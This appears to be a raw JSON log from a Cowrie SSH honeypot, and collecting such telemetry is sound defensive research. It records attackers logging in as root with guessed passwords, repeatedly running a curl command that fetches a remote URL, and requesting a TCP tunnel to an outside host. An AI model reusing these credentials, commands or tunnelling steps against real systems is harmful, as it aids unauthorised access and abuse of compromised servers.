{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:11.684371Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:11.836582Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:11.841630Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:11.992274Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:12.139839Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:12.233223Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:12.381743Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:13.046711Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:13.085855Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:13.318574Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:13.322958Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:13.518777Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:13.540433Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:13.842331Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:14.036185Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:14.252952Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:15.084413Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:15.156023Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:15.337918Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:15.369939Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:15.427694Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:15.432724Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:15.921520Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:16.023627Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T09:01:16.065090Z","src_ip":"212.227.235.229","session":"6a08127ff406"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:16.546713Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:16.573110Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:16.738773Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:16.845272Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:16.962866Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:17.028223Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:17.372474Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:17.643570Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:17.751019Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T09:01:17.782578Z","session":"6a08127ff406"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64206,"dst_ip":"1.2.3.4","dst_port":22,"session":"514bbfe86b48","protocol":"ssh","message":"New connection: 77.83.207.83:64206 (1.2.3.4:22) [session: 514bbfe86b48]","sensor":"my-vps","timestamp":"2025-08-31T09:01:17.821756Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:17.827034Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:17.829219Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:17.832634Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:17.833102Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:17.834359Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:17.834825Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:18.051571Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:18.589838Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:19.124823Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T09:01:19.162697Z","src_ip":"77.83.207.83","session":"514bbfe86b48"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T09:01:19.252638Z","src_ip":"77.83.207.83","session":"514bbfe86b48"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:19.672844Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:19.694946Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:19.781925Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:19.852343Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:20.005435Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:20.076945Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:23.052530Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:23.130999Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:23.133840Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:23.167590Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:23.170816Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:23.332631Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:23.386973Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:23.661456Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:24.220640Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:24.882316Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:24.981427Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:25.022153Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:25.067088Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:25.071059Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:25.125053Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:25.131943Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:26.828828Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:26.851069Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:26.958946Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:26.979390Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:27.132944Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:27.140289Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T09:01:27.181066Z","src_ip":"77.83.207.83","session":"514bbfe86b48"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:27.327111Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:27.423310Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
